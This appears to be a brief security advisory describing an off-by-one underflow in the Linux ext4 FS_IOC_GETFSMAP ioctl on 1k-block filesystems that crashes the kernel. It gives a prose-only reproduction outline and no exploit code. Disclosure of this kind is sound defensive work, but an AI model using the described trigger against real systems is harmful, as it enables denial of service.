Linux Kernel ext4 Filesystem Off-by-One Vulnerability in FS_IOC_GETFSMAP IOCTL

An off-by-one vulnerability has been identified in the ext4 filesystem of the Linux kernel, specifically on 1k block filesystems. This issue arises when the FS_IOC_GETFSMAP ioctl is used to query filesystem mappings. The vulnerability leads to a kernel crash due to insufficient validation of the input range, allowing for an underflow that disrupts normal processing. The problem has been traced back to how block numbers are calculated and validated, particularly for keys that reference physical blocks outside the valid range.

Impact

Exploitation of this vulnerability causes a kernel crash, disrupting system operations and potentially leading to a denial of service.

Reproduction

The vulnerability can be reproduced by issuing an FS_IOC_GETFSMAP ioctl call on a 1k-block ext4 filesystem. The request must include keys that reference physical blocks in a way that triggers the off-by-one error, such as by querying mappings that overlap with invalid block ranges.